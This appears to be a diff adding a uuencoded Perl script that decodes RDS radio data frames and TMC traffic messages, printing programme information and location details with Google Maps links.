+M('L*("`@(`H@("`@<F5T=7)N('5N;&5S<R`D7ULP72`]?B`O7BA;,#%=>S$P
+M?2DH6S`Q77LT?2DH6S`Q77LQ?2DH6S`Q77LQ?2DH6S`Q77LU?2DH6S`Q77LU
+M?2DH6S`Q77LQ,'TI*%LP,5U[,39]*2A;,#%=>S$P?2DH6S`Q77LQ-GTI*%LP
+M,5U[,3!]*2\["B`@("`*("`@(&UY("@D<W5M02P@)$=24"P@)%9%4BP@)%10
+M+"`D4%19*2`@("`@("`]("@D,2P@)#(L("0S+"`D-"P@)#4I.PH@("`@;7D@
+M*"1B,BP@)'-U;4(L("1B,RP@)'-U;4,L("1B-"P@)'-U;40I(#T@*"0V+"`D
+M-RP@)#@L("0Y+"`D,3`L("0Q,2D["@H@("`@<F5T=7)N(&EF("@D;W!T<WLG
+M="=]("8F('!A<G-E7V=R<"@D1U)0("X@)%9%4BD@(7X@+SA!+RD["@H@("`@
+M:68@*"1O<'1S>R=()WTI('L@"B`@("`@("`@;W!E;B@D1D@L("(^)&1I<B]R
+M9',M)&EN9&5X+FAT;6PB*3L*("`@("`@("!P<FEN="!)3D1%6"`B/&$@:')E
+M9CU<(G)D<RTD:6YD97@N:'1M;%PB/B1I;F1E>#PO83X@+2!023H@(B`N(&)I
+M;C)H97@H)%!)*2`N("(@1U)0.B`D1U)0+R1615(@(B`N('!A<G-E7V=R<"@D
+M1U)0("X@)%9%4BD@+B`B7&XB.PH@("`@("`@('!R:6YT("1&2"`B/&AT;6P^
+M/&)O9'D^/'!R93XB(&EF("@D;W!T<WLG2"=]*3L*("`@('T@96QS92!["B`@
+M("`@("`@;W!E;B@D1D@L("(^+2(I.PH@("`@?0H*("`@('!R:6YT("1&2"`B
+M1V]T(%)$4R!M97-S86=E("AF<F%M92`D:6YD97@I7&XB+`H@("`@("`@("`@
+M("`@(")<=%!R;V=R86UM92!)9&5N=&EF:6-A=&EO;CH@)%!)(B`N("(@*"(@
+M+B!B:6XR:&5X*"1022D@+B`B*2(@+B`B7&XB+`H@("`@("`@("`@("`@(")<
+M=$=R;W5P('1Y<&4@8V]D92]V97)S:6]N.B`D1U)0+R1615(B("X@(B`H(B`N
+M('!A<G-E7V=R<"@D1U)0("X@)%9%4BD@+B`B*2(@+B`B7&XB+`H@("`@("`@
+M("`@("`@(")<=%1R869F:6,@4')O9W)A;3H@)%107&XB+`H@("`@("`@("`@
+M("`@(")<=%!R;V=R86UM92!4>7!E.B`D4%19(B`N("(@*"(@+B!P87)S95]P
+M='DH)%!462D@+B`B*2(@+B`B7&XB+`H@("`@("`@("`@("`@(")<=$)L;V-K
+M(#(Z("1B,EQN(BP*("`@("`@("`@("`@("`B7'1";&]C:R`S.B`D8C-<;B(L
+M"B`@("`@("`@("`@("`@(EQT0FQO8VL@-#H@)&(T7&XB.PH*("`@(&EF("AP
+M87)S95]G<G`H)$=24"`N("1615(I(#U^("\P02\I('L@"B`@("`@("`@<')I
+M;G0@)$9((")<=$1E8V]D960@,$$@9W)O=7`Z7&XB.PH@("`@("`@('!A<G-E
+M7S!!*"1B,BP@)&(S+"`D8C0I.PH@("`@?2`@("`@"@H@("`@:68@*'!A<G-E
+M7V=R<"@D1U)0("X@)%9%4BD@/7X@+SA!+RD@>R`*("`@("`@("!P<FEN="`D
+M1D@@(EQT1&5C;V1E9"`X02!G<F]U<#I<;B(["B`@("`@("`@<&%R<V5?.$$H
+M)&(R+"`D8C,L("1B-"D["B`@("!]("`@("`*"B`@("!P<FEN="`D1D@@(EQN
+M(CL*("`@('!R:6YT("1&2"`B/"]P<F4^/"]H=&UL/CPO8F]D>3XB(&EF("@D
+M;W!T<WLG2"=]*3L*("`@(&-L;W-E("1&2#L*?0H*<W5B('!A<G-E7S!!('L*
+M("`@(&UY("@D5$$L("1-4RP@)$1)+"`D0S$L("1#,"D@/2!S:&EF="`]?B`O
+M*%LP,5U[,7TI*%LP,5U[,7TI*%LP,5U[,7TI*%LP,5U[,7TI*%LP,5U[,7TI
+M+SL*("`@(&UY("@D048Q+"`D048R*2`@("`@("`@("`@("`@/2!S:&EF="`]
+M?B`O*%LP,5U[.'TI*%LP,5U[.'TI+SL*("`@(&UY("@D0C%!+"`D0C%"+"`D
+M0C)!+"`D0C)"*2`@/2!S:&EF="`]?B`O*%LP,5U[-'TI*%LP,5U[-'TI*%LP
+M,5U[-'TI*%LP,5U[-'TI+SL*"B`@("!M>2`D8VAA<C$@/2!P87)S95]C:&%R
+M*"1",4$L("1",4(I.PH@("`@;7D@)&-H87(R(#T@<&%R<V5?8VAA<B@D0C)!
+M+"`D0C)"*3L*"B`@("!P<FEN="`D1D@@(EQT7'14<F%F9FEC($%N;F]U;F-E
+M;65N=#H@)%1!7&XB+`H@("`@("`@("`@("`@(")<=%QT375S:6,@4W!E96-H
+M('-W:71C:#H@)%1!7&XB+`H@("`@("`@("`@("`@(")<=%QT1&5C;V1E<B!)
+M9&5N=&EF:6-A=&EO;B!C;VYT<F]L.B`D1$DD0S$D0S`@*"(@+B!P87)S95]D
+M:2@D1$DL("1#,2P@)$,P*2`N("(I7&XB+`H@("`@("`@("`@("`@(")<=%QT
+M06QT97)N871I=F4@1G)E<75E;F-I97,Z("1!1C$L("1!1C(@*"(@+B!P87)S
+M95]!1B@D048Q*2`N("(L("(@+B!P87)S95]!1B@D048R*2`N("(I7&XB+`H@
+M("`@("`@("`@("`@(")<=%QT4')O9W)A;6UE(%-E<G9I8V4@;F%M93H@)$(Q
+M021",4(D0C)!)$(R0B`H(B`N("1C:&%R,2`N("1C:&%R,B`N("(I7&XB.PH*
+M("`@(&EF("@H)$,Q("X@)$,P*2!E<2`B,3$B*2![("104TY;,UT@/2`B)&-H
+M87(Q)&-H87(R(CL@?0H@("`@:68@*"@D0S$@+B`D0S`I(&5Q("(Q,"(I('L@
+M)%!33ELR72`]("(D8VAA<C$D8VAA<C(B.R!]"B`@("!I9B`H*"1#,2`N("1#
+M,"D@97$@(C`Q(BD@>R`D4%-.6S%=(#T@(B1C:&%R,21C:&%R,B([('T*("`@
+M(&EF("@H)$,Q("X@)$,P*2!E<2`B,#`B*2![("104TY;,%T@/2`B)&-H87(Q
+M)&-H87(R(CL@?0H@"B`@("!P<FEN="`D1D@@(EQT7'1#;VQL96-T960@4%-.
+M.B`B.PH@("`@9F]R96%C:"!M>2`D8VAA<B`H0%!33BD@>R`*("`@("`@("!I
+M9B`H)&-H87(I('L@<')I;G0@)$9(("1C:&%R.R!]"B`@("!]"B`@("!P<FEN
+M="`D1D@@(EQN(CL*?0H*<W5B('!A<G-E7SA!('L*("`@(&UY("@D5"P@)$8L
+M("1$4"D@("`@("`@("`@("`@(#T@)%];,%T@/7X@+RA;,#%=>S%]*2A;,#%=
+M>S%]*2A;,#%=>S-]*2\["B`@("!M>2`H)$0L("103BP@)$5X=&5N="P@)$5V
+M96YT*2`]("1?6S%=(#U^("\H6S`Q77LQ?2DH6S`Q77LQ?2DH6S`Q77LS?2DH
+M6S`Q77LQ,7TI+SL*("`@(&UY("@D3&]C871I;VXI("`@("`@("`@("`@("`@
+M(#T@)%];,ET@/7X@+RA;,#%=>S$V?2DO.PH*("`@('!R:6YT("1&2"`B7'1<
+M=$)I="!8-#H@)%0@*"(@+B!P87)S95]4*"14*2`N("(I7&XB.PH@("`@<')I
+M;G0@)$9((")<=%QT0FET(%@S.B`D1B`H(B`N('!A<G-E7T8H)$8I.PH*("`@
+M(&EF("AP87)S95]&*"1&*2`]?B`O375L=&DO*2!["B`@("`@("`@:68@*"14
+M(#T](#`@)B8@)$8@/3T@,"`F)B`D1"`]/2`Q*2!["B`@("`@("`@("`@('!R
+M:6YT("1&2"`B("T@9FER<W0@9W)O=7`I7&XB+`H@("`@("`@("`@("`@("`@
+M("`@("`@(EQT7'1#;VYT:6YU:71Y($EN9&5X.B`D1%!<;B(L"B`@("`@("`@
+M("`@("`@("`@("`@("`B7'1<=$1I<F5C=&EO;CH@)%!.("@B("X@<&%R<V5?
+M4$XH)%!.*2`N("(I7&XB+`H@("`@("`@("`@("`@("`@("`@("`@(EQT7'1%
+M>'1E;G0Z("1%>'1E;G0@*"(@+B!B:6XR9&5C*"1%>'1E;G0I("X@(BE<;B(L
+M"B`@("`@("`@("`@("`@("`@("`@("`B7'1<=$5V96YT.B`D179E;G0@*"(@
+M+B!B:6XR9&5C*"1%=F5N="D@+B`B("T@(B`N('!A<G-E7T5V96YT*"1%=F5N
+M="D@+B`B*5QN(BP*("`@("`@("`@("`@("`@("`@("`@(")<=%QT3&]C871I
+M;VXZ("1,;V-A=&EO;B`H(B`N(&)I;C)D96,H)$QO8V%T:6]N*2`N("(I7&XB
+M+`H@("`@("`@("`@("`@("`@("`@("`@(EQT7'1$96-O9&5D($QO8V%T:6]N
+M.EQN(CL*("`@("`@("`@("`@<&%R<V5?;&]C871I;VXH8FEN,F1E8R@D3&]C
+M871I;VXI*3L@"B`@("`@("`@?2!E;'-I9B`H)%0@/3T@,"`F)B`D1B`]/2`P
+M("8F("1$(#T](#`I('L*"B`@("`@("`@("`@(&UY("@D1U-)+"`D;75L=&DQ
+M*2`]("1?6S%=("`@("`@("`@("`@("`@/7X@+ULP,5U[,GTH6S`Q77LR?2DH
+M6S`Q77LQ,GTI+SL*("`@("`@("`@("`@;7D@*"1M=6QT:3(I("`@("`@(#T@
+M)%];,ET@("`@("`@("`@("`@("`]?B`O*%LP,5U[,39]*2\["B`@("`@("`@
+M("`@(&UY("@D;&%B96PI("`@("`@("`]("@D;75L=&DQ("X@)&UU;'1I,BD@
+M/7X@+RA;,#%=>S1]*5LP,5U[,C1]+SL*"B`@("`@("`@("`@('!R:6YT("1&
+M2"`B("T@<W5B<V5Q=65N="!G<F]U<"E<;B(L"B`@("`@("`@("`@("`@("`@
+M("`@("`B7'1<=$-O;G1I;G5I='D@26YD97@Z("1$4%QN(BP*("`@("`@("`@
+M("`@("`@("`@("`@(")<=%QT4V5C;VYD($=R;W5P(&EN9&EC871O<CH@)%!.
+M7&XB+`H@("`@("`@("`@("`@("`@("`@("`@(EQT7'1'<F]U<"!397%U96YC
+M92!)9&5N=&EF:65R.B`D1U-)7&XB+`H)("`@("`@("`@("`@("`B7'1<=$9R
+M964@0FQO8VLZ("1M=6QT:3$D;75L=&DR7&XB+`H)("`@("`@("`@("`@("`B
+M7'1<=%QT3&%B96P@,3H@(B`N(&)I;C)D96,H)&QA8F5L*2`N(")<;B(["B`@
+M("`@("`@?0H@("`@?2!E;'-E('L*("`@("`@("!P<FEN="`D1D@@(BE<;B([
+M"B`@("!]"@H@("`@:68@*'!A<G-E7T8H)$8I(#U^("]3:6YG;&4O*2!["B`@
+M("`@("`@<')I;G0@)$9((")<=%QT1'5R871I;VX@86YD(%!E<G-I<W1E;F-E
+M.B`D1%`@*"(@+B!P87)S95]$4"@D1%`I("X@(BE<;B(L"B`@("`@("`@("`@
+M("`@("`@(")<=%QT1&EV97)S:6]N(&%D=FEC93H@)$1<;B(L"B`@("`@("`@
+M("`@("`@("`@(")<=%QT1&ER96-T:6]N.B`D4$X@*"(@+B!P87)S95]03B@D
+M4$XI("X@(BE<;B(L"B`@("`@("`@("`@("`@("`@(")<=%QT17AT96YT.B`D
+M17AT96YT("@B("X@8FEN,F1E8R@D17AT96YT*2`N("(I7&XB+`H@("`@("`@
+M("`@("`@("`@("`B7'1<=$5V96YT.B`D179E;G0@*"(@+B!B:6XR9&5C*"1%
+M=F5N="D@+B`B("T@(B`N('!A<G-E7T5V96YT*"1%=F5N="D@+B`B*5QN(BP*
+M("`@("`@("`@("`@("`@("`@(EQT7'1,;V-A=&EO;CH@)$QO8V%T:6]N("@B
+M("X@8FEN,F1E8R@D3&]C871I;VXI("X@(BE<;B(L"B`@("`@("`@("`@("`@
+M("`@(")<=%QT1&5C;V1E9"!,;V-A=&EO;CI<;B(["B`@("`@("`@<&%R<V5?
+M;&]C871I;VXH8FEN,F1E8R@D3&]C871I;VXI*3L@"B`@("!]"B`@("!P<FEN
+M="`D1D@@(EQN(CL*?0H*<W5B('!A<G-E7T%&('L*("`@(')E='5R;B`H.#<N
+M-2`K(&)I;C)D96,H)%];,%TI+S$P*3L*?0H*<W5B('!A<G-E7V-H87(@>PH@
+M("`@;7D@)&-H87(@/2`D8VAA<GLB)%];,%TB?7LB)%];,5TB?3L*("`@(')E
+M='5R;B`H9&5F:6YE9"@D8VAA<BDI/R1C:&%R.B<_)SL*?0H*<W5B('!A<G-E
+M7U0@>PH@("`@<F5T=7)N(")5<V5R(&UE<W-A9V4B("`@("`@(&EF("@D7ULP
+M72`]/2`B,"(I.PH@("`@<F5T=7)N(")4=6YI;F<@26YF;W)M871I;VXB(&EF
+M("@D7ULP72`]/2`B,2(I.PI]"@IS=6(@<&%R<V5?1B!["B`@("!R971U<FX@
+M(DUU;'1I+6=R;W5P(&UE<W-A9V4B("!I9B`H)%];,%T@/3T@(C`B*3L*("`@
+M(')E='5R;B`B4VEN9VQE+6=R;W5P(&UE<W-A9V4B(&EF("@D7ULP72`]/2`B
+M,2(I.PI]"@IS=6(@<&%R<V5?1%`@>PH@("`@<F5T=7)N("1$4%MB:6XR9&5C
+M*"1?6S!=*5T@?'P@(G5N:VYO=VXB.PI]"@IS=6(@<&%R<V5?4$X@>PH@("`@
+M<F5T=7)N("103ELD7ULP75T@?'P@(G5N:VYO=VXB.PI]"@IS=6(@<&%R<V5?
+M179E;G0@>PH@("`@<F5T=7)N("1%=F5N=%MB:6XR9&5C*"1?6S!=*5T@?'P@
+M(G5N:VYO=VXB.PI]"@IS=6(@<&%R<V5?9&D@>PH@("`@<F5T=7)N("1D:7LD
+M7ULP72`N("1?6S%=("X@)%];,EU]('Q\(")U;FMN;W=N(CL*?2`@(`H*<W5B
+M('!A<G-E7W!T>2!["B`@("!R971U<FX@)'!T>7LB)%];,%TB?2!\?"`B=6YK
+M;F]W;B(["GT@("`@"@IS=6(@<&%R<V5?9W)P('L*("`@(')E='5R;B`D9W)P
+M>R(D7ULP72)]('Q\(")U;FMN;W=N(CL*?0H*<W5B('!A<G-E7VQO8V%T:6]N
+M('L*"B`@("!I9B`H(21O<'1S>R=D)WTI('L*("`@("`@("!P<FEN="`D1D@@
+M(EQT7'1<=#QN;R!L;V-A=&EO;B!T86)L92!S<&5C:69I960^(CL*("`@("`@
+M("!R971U<FX["B`@("!]"@H@("`@;7D@)&-O9&4@/2`D7ULP73L*"B`@("!I
+M9B`H)'!O:6YT>R1C;V1E?2D@>PH@("`@("`@(&UY("1X("`@("`@(#T@)'!O
+M:6YT>R1C;V1E?7LG6$-/3U)$)WT["B`@("`@("`@;7D@)'D@("`@("`@/2`D
+M<&]I;G1[)&-O9&5]>R=90T]/4D0G?3L*("`@("`@("!M>2`D;FED("`@("`]
+M("1P;VEN='LD8V]D97U[)TXQ240G?3L@"B`@("`@("`@;7D@)')O860@("`@
+M/2`D<&]I;G1[)&-O9&5]>R=23T%?3$-$)WT["B`@("`@("`@;7D@)'-E9VUE
+M;G0@/2`D<&]I;G1[)&-O9&5]>R=314=?3$-$)WT["@H@("`@("`@('!R:6YT
+M("1&2"`B7'1<=%QT3&]C871I;VX@8V]D92!T>7!E.B!03TE.5%QN(CL*("`@
+M("`@("!P<FEN="`D1D@@(EQT7'1<=$YA;64@240Z("1N:60@*"1N86UE>R1N
+M:61]*5QN(B`@("`@("`@("`@("`@("`@("`@("`@("!I9B`D;FED.PH@("`@
+M("`@('!R:6YT("1&2"`B7'1<=%QT4F]A9"!C;V1E.B`D<F]A9"`H)')O861[
+M)')O861]>R=.04U%)WTI7&XB("`@("`@("`@("`@(&EF("1R;V%D.PH@("`@
+M("`@('!R:6YT("1&2"`B7'1<=%QT4V5G;65N="!C;V1E.B`D<V5G;65N="`H
+M)'-E9VUE;G1[)'-E9VUE;G1]>R=.04U%)WTI7&XB(&EF("1S96=M96YT.PH@
+M("`@("`@(&EF("@D>2`F)B`D>"D@>PH@("`@("`@("`@("!P<FEN="`D1D@@
+M(EQT7'1<=$=04SH@)'D@3B`D>"!%7&XB.PH@("`@("`@("`@("!I9B`H)&]P
+M='-[)T@G?2D@>PH@("`@("`@("`@("`@("`@<')I;G0@)$9((")<=%QT7'0\
+M82!H<F5F/5PB:'1T<#HO+VUA<',N9V]O9VQE+F-O;2]M87!S/VQL/2(@+B`D
+M>2`N("(L(B`N("1X("X@(B9S<&X],"XS+#`N,R9Q/2(@+B`D>2`N("(L(B`N
+M("1X("X@(EPB/DUA<"!,:6YK/"]A/EQN(CL*("`@("`@("`@("`@?2!E;'-E
+M('L*("`@("`@("`@("`@<')I;G0@)$9((")<=%QT7'1,:6YK.B!H='1P.B\O
+M;6%P<RYG;V]G;&4N8V]M+VUA<',_;&P](B`N("1Y("X@(BPB("X@)'@@+B`B
+M)G-P;CTP+C,L,"XS)G$](B`N("1Y("X@(BPB("X@)'@@+B`B7&XB.PH@("`@
+M("`@("`@("!]"B`@("`@("`@?0H@("`@?2!E;'-I9B`H)')O861[)&-O9&5]
+M*2!["B`@("`@("`@;7D@)'@@("`@("`@/2`D<&]I;G1[)')O861[)&-O9&5]
+M>R=03TQ?3$-$)WU]>R=80T]/4D0G?3L*("`@("`@("!M>2`D>2`@("`@("`]
+M("1P;VEN='LD<F]A9'LD8V]D97U[)U!/3%],0T0G?7U[)UE#3T]21"=].PH@
+M("`@("`@(&UY("1N,6ED("`@(#T@)')O861[)&-O9&5]>R=.,4E$)WT["B`@
+M("`@("`@;7D@)&XR:60@("`@/2`D<F]A9'LD8V]D97U[)TXR240G?3L*("`@
+M("`@("!M>2`D;F%M92`@("`]("1R;V%D>R1C;V1E?7LG3D%-12=].PH@("`@
+M("`@(&UY("1R;V%D("`@(#T@)'!O:6YT>R1C;V1E?7LG4D]!7TQ#1"=].PH@
+M("`@("`@(&UY("1S96=M96YT(#T@)'!O:6YT>R1C;V1E?7LG4T5'7TQ#1"=]
+M.PH*("`@("`@("!P<FEN="`D1D@@(EQT7'1<=$QO8V%T:6]N(&-O9&4@='EP
+M93H@4D]!1%QN(CL*("`@("`@("!P<FEN="`D1D@@(EQT7'1<=$YA;64@241S
+M.B`D;C%I9"`M("1N,FED("@D;F%M92E<;B(@("`@("`@("`@("`@("`@("`@
+M("`@:68@*"1N,6ED("8F("1N,FED*3L*("`@("`@("!P<FEN="`D1D@@(EQT
+M7'1<=%)O860@8V]D93H@)')O860@*"1R;V%D>R1R;V%D?7LG3D%-12=]*5QN
+M(B`@("`@("`@("`@("`@:68@)')O860["B`@("`@("`@<')I;G0@)$9((")<
+M=%QT7'1396=M96YT(&-O9&4Z("1S96=M96YT("@D<V5G;65N='LD<V5G;65N
+M='U[)TY!344G?2E<;B(@(&EF("1S96=M96YT.PH@("`@("`@(&EF("@D>2`F
+M)B`D>"D@>PH@("`@("`@("`@("!P<FEN="`D1D@@(EQT7'1<=$=04SH@)'D@
+M3B`D>"!%7&XB.PH@("`@("`@("`@("!I9B`H)&]P='-[)T@G?2D@>PH@("`@
+M("`@("`@("`@("`@<')I;G0@)$9((")<=%QT7'0\82!H<F5F/5PB:'1T<#HO
+M+VUA<',N9V]O9VQE+F-O;2]M87!S/VQL/2(@+B`D>2`N("(L(B`N("1X("X@
+M(B9S<&X],"XS+#`N,R9Q/2(@+B`D>2`N("(L(B`N("1X("X@(EPB/DUA<"!,
+M:6YK/"]A/EQN(CL*("`@("`@("`@("`@?2!E;'-E('L*("`@("`@("`@("`@
+M<')I;G0@)$9((")<=%QT7'1,:6YK.B!H='1P.B\O;6%P<RYG;V]G;&4N8V]M
+M+VUA<',_;&P](B`N("1Y("X@(BPB("X@)'@@+B`B)G-P;CTP+C,L,"XS)G$]
+M(B`N("1Y("X@(BPB("X@)'@@+B`B7&XB.PH@("`@("`@("`@("!]"B`@("`@
+M("`@?0H@("`@?2!E;'-I9B`H)'-E9VUE;G1[)&-O9&5]*2!["B`@("`@("`@
+M;7D@)'@@("`@("`@/2`D<&]I;G1[)'-E9VUE;G1[)&-O9&5]>R=03TQ?3$-$
+M)WU]>R=80T]/4D0G?3L*("`@("`@("!M>2`D>2`@("`@("`]("1P;VEN='LD
+M<V5G;65N='LD8V]D97U[)U!/3%],0T0G?7U[)UE#3T]21"=].PH@("`@("`@
+M(&UY("1N,6ED("`@(#T@)'-E9VUE;G1[)&-O9&5]>R=.,4E$)WT["B`@("`@
+M("`@;7D@)&XR:60@("`@/2`D<V5G;65N='LD8V]D97U[)TXR240G?3L*("`@
+M("`@("!M>2`D;F%M92`@("`]("1S96=M96YT>R1C;V1E?7LG3D%-12=].PH@
+M("`@("`@(&UY("1R;V%D("`@(#T@)'!O:6YT>R1C;V1E?7LG4D]!7TQ#1"=]
+M.PH@("`@("`@(&UY("1S96=M96YT(#T@)'!O:6YT>R1C;V1E?7LG4T5'7TQ#
+M1"=].PH@("`@("`@(&UY("1P;VEN="`@(#T@)'!O:6YT>R1C;V1E?7LG4$],
+M7TQ#1"=].PH*("`@("`@("!P<FEN="`D1D@@(EQT7'1<=$QO8V%T:6]N(&-O
+M9&4@='EP93H@4D]!1%QN(CL*("`@("`@("!P<FEN="`D1D@@(EQT7'1<=$YA
+M;64@241S.B`D;C%I9"`M("1N,FED("@D;F%M92E<;B(@("`@("`@("`@("`@
+M("`@("`@("!I9B`H)&XQ:60@)B8@)&XR:60I.PH@("`@("`@('!R:6YT("1&
+M2"`B7'1<=%QT4F]A9"!C;V1E.B`D<F]A9"`H)')O861[)')O861]>R=.04U%
+M)WTI7&XB("`@("`@("`@("`@(&EF("1R;V%D.PH@("`@("`@('!R:6YT("1&
+M2"`B7'1<=%QT4V5G;65N="!C;V1E.B`D<V5G;65N="`H)'-E9VUE;G1[)'-E
+M9VUE;G1]>R=.04U%)WTI7&XB(&EF("1S96=M96YT.PH@("`@("`@(&EF("@D
+M>2`F)B`D>"D@>PH@("`@("`@("`@("!I9B`H)&]P='-[)T@G?2D@>PH@("`@
+M("`@("`@("`@("`@<')I;G0@(EQT7'1<=$QI;FLZ(#QA(&AR968]7")H='1P
+M.B\O;6%P<RYG;V]G;&4N8V]M+VUA<',_;&P](B`N("1Y("X@(BPB("X@)'@@
+M+B`B)G-P;CTP+C,L,"XS)G$](B`N("1Y("X@(BPB("X@)'@@+B`B7"(^36%P
+M/"]A/EQN(CL*("`@("`@("`@("`@?2!E;'-E('L*("`@("`@("`@("`@<')I
+M;G0@)$9((")<=%QT7'1,:6YK.B!H='1P.B\O;6%P<RYG;V]G;&4N8V]M+VUA
+M<',_;&P](B`N("1Y("X@(BPB("X@)'@@+B`B)G-P;CTP+C,L,"XS)G$](B`N
+M("1Y("X@(BPB("X@)'@@+B`B7&XB.PH@("`@("`@("`@("!]"B`@("`@("`@
+M?0H@("`@?2!E;'-E('L*("`@("`@("!P<FEN="`D1D@@(EQT7'1<=%5N:VYO
+M=VX@3&]C871I;VXB.PH@("`@?0I]"@IS=6(@<F5A9%]T;6-?=&%B;&4@>PH*
+M("`@(&UY("1C;W5N="`](#`["B`@("!M>2`D=&%B;&5?<&%T:"`]("1?6S!=
+M.PH@("`@<')I;G0@(E)E861I;F<@5$U#($QO8V%T:6]N(%1A8FQE(&%T("1T
+M86)L95]P871H.EQN(CL*"B`@("!O<&5N*%!/24Y44RP@("`B/"1T86)L95]P
+M871H+U!/24Y44RYD870B*2`@(&]R(&1I92`B0V]U;&0@;F]T(&]P96X@)'1A
+M8FQE7W!A=&@O4$])3E13+F1A=#H@)"%<;B(["B`@("!O<&5N*$Y!3453+"`@
+M("`B/"1T86)L95]P871H+TY!3453+F1A="(I("`@(&]R(&1I92`B0V]U;&0@
+M;F]T(&]P96X@)'1A8FQE7W!A=&@O3D%-15,N9&%T.B`D(5QN(CL*("`@(&]P
+M96XH4D]!1%,L("`@("(\)'1A8FQE7W!A=&@O4D]!1%,N9&%T(BD@("`@;W(@
+M9&EE(")#;W5L9"!N;W0@;W!E;B`D=&%B;&5?<&%T:"]23T%$4RYD870Z("0A
+M7&XB.PH@("`@;W!E;BA314=-14Y44RP@(CPD=&%B;&5?<&%T:"]314=-14Y4
+M4RYD870B*2!O<B!D:64@(D-O=6QD(&YO="!O<&5N("1T86)L95]P871H+U-%
+M1TU%3E13+F1A=#H@)"%<;B(["@H@("`@<')I;G0@(EQT('!A<G-I;F<@3D%-
+M15,Z("(["B`@("!W:&EL92`H/$Y!3453/BD@>PH@("`@("`@(&YE>'0@=6YL
+M97-S("]>6S`M.5TO.PH*("`@("`@("!M>2!`;&EN92`]('-P;&ET("@O.R\L
+M("1?*3L*("`@("`@("!M>2`H)$-)1"P@)$Q)1"P@)$Y)1"P@)$Y!344L("1.
+M0T]-345.5"D@/2!`;&EN93L*("`@(`H@("`@("`@("1N86UE>R1.241](#T@
+M)$Y!344[(`H@("`@("`@("1C;W5N="LK.PH@("`@?0H@("`@<')I;G0@(B1C
+M;W5N="!E;G1R:65S7&XB.R`D8V]U;G0@/2`P.PH*("`@('!R:6YT(")<="!P
+M87)S:6YG(%)/0413.B`B.PH@("`@=VAI;&4@*#Q23T%$4SXI('L*("`@("`@
+M("!N97AT('5N;&5S<R`O7ELP+3E=+SL*"B`@("`@("`@;7D@0&QI;F4@/2!S
+M<&QI="`H+SLO+"`D7RD["B`@("`@("`@;7D@*"1#240L("1404)#+"`D3$-$
+M+"`D0TQ!4U,L("140T0L("135$-$+"`D4D]!1$Y534)%4BP@)%).240L("1.
+M,4E$+"`D3C))1"P@)%!/3%],0T0L("1015-?3$56*2`]($!L:6YE.PH@("`@
+M"B`@("`@("`@)')O861[)$Q#1'U[)U)/041.54U"15(G?2`]("123T%$3E5-
+M0D52.PH@("`@("`@("1R;V%D>R1,0T1]>R=.,4E$)WT@("`@("`@/2`D3C%)
+M1#L*("`@("`@("`D<F]A9'LD3$-$?7LG3C))1"=]("`@("`@(#T@)$XR240[
+M"B`@("`@("`@)')O861[)$Q#1'U[)U!/3%],0T0G?2`@("`]("103TQ?3$-$
+M.PH@("`@("`@("1R;V%D>R1,0T1]>R=.04U%)WT@("`@("`@/2`D;F%M97LD
+M3C%)1'T@+B`B+2(@+B`D;F%M97LD3C))1'T["B`@("`@("`@)&-O=6YT*RL[
+M"B`@("!]"B`@("!P<FEN="`B)&-O=6YT(&5N=')I97-<;B([("1C;W5N="`]
+M(#`["@H@("`@<')I;G0@(EQT('!A<G-I;F<@4T5'345.5%,Z("(["B`@("!W
+M:&EL92`H/%-%1TU%3E13/BD@>PH@("`@("`@(&YE>'0@=6YL97-S("]>6S`M
+M.5TO.PH*("`@("`@("!M>2!`;&EN92`]('-P;&ET("@O.R\L("1?*3L*("`@
+M("`@("!M>2`H)$-)1"P@)%1!0D,L("1,0T0L("1#3$%34RP@)%1#1"P@)%-4
+M0T0L("123T%$3E5-0D52+"`D4DY)1"P@)$XQ240L("1.,DE$+"`D4D]!7TQ#
+M1"P@)%-%1U],0T0L("103TQ?3$-$*2`]($!L:6YE.PH@("`@"B`@("`@("`@
+M)'-E9VUE;G1[)$Q#1'U[)U)/041.54U"15(G?2`]("123T%$3E5-0D52.PH@
+M("`@("`@("1S96=M96YT>R1,0T1]>R=.,4E$)WT@("`@("`@/2`D3C%)1#L*
+M("`@("`@("`D<V5G;65N='LD3$-$?7LG3C))1"=]("`@("`@(#T@)$XQ240[
+M"B`@("`@("`@)'-E9VUE;G1[)$Q#1'U[)U)/05],0T0G?2`@("`]("123T%?
+M3$-$.PH@("`@("`@("1S96=M96YT>R1,0T1]>R=314=?3$-$)WT@("`@/2`D
+M4T5'7TQ#1#L*("`@("`@("`D<V5G;65N='LD3$-$?7LG4$],7TQ#1"=]("`@
+M(#T@)%!/3%],0T0["B`@("`@("`@)'-E9VUE;G1[)$Q#1'U[)TY!344G?2`@
+M("`@("`]("1N86UE>R1.,4E$?2`N("(M(B`N("1N86UE>R1.,DE$?3L*("`@
+M("`@("`D8V]U;G0K*SL*("`@('T*("`@('!R:6YT("(D8V]U;G0@96YT<FEE
+M<UQN(CL@)&-O=6YT(#T@,#L*"B`@("!P<FEN="`B7'0@<&%R<VEN9R!03TE.
+M5%,Z("(["B`@("!W:&EL92`H/%!/24Y44SXI('L*("`@("`@("!N97AT('5N
+M;&5S<R`O7ELP+3E=+SL*"B`@("`@("`@;7D@0&QI;F4@/2!S<&QI="`H+SLO
+M+"`D7RD["B`@("`@("`@;7D@*"1#240L("1404)#1"P@)$Q#1"P@)$-,05-3
+M+"`D5$-$+"`D4U1#1"P@)$I53D-424].355-0D52+"`D4DY)1"P@)$XQ240L
+M("1.,DE$+"`D4$],7TQ#1"P@)$]42%],0T0L("1314=?3$-$+"`D4D]!7TQ#
+M1"P@)$E.4$]3+"`D24Y.14<L("1/55103U,L("1/551.14<L("104D5314Y4
+M4$]3+"`D4%)%4T5.5$Y%1RP@)$1)5D524TE/3E!/4RP@)$1)5D524TE/3DY%
+M1RP@)%A#3T]21"P@)%E#3T]21"P@)$E.5$524E505%-23T%$+"`D55).04(I
+M(#T@0&QI;F4[("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("`@(`H*("`@("`@("!M>2`D>"`]("@D6$-/3U)$+S$P,#`P,"D["B`@("`@
+M("`@;7D@)'D@/2`H)%E#3T]21"\Q,#`P,#`I.PH*("`@("`@("`D<&]I;G1[
+M)$Q#1'U[)UA#3T]21"=]("`@/2`D>#L*("`@("`@("`D<&]I;G1[)$Q#1'U[
+M)UE#3T]21"=]("`@/2`D>3L*("`@("`@("`D<&]I;G1[)$Q#1'U[)U).240G
+M?2`@("`@/2`D4DY)1#L*("`@("`@("`D<&]I;G1[)$Q#1'U[)TXQ240G?2`@
+M("`@/2`D3C%)1#L*("`@("`@("`D<&]I;G1[)$Q#1'U[)U)/05],0T0G?2`@
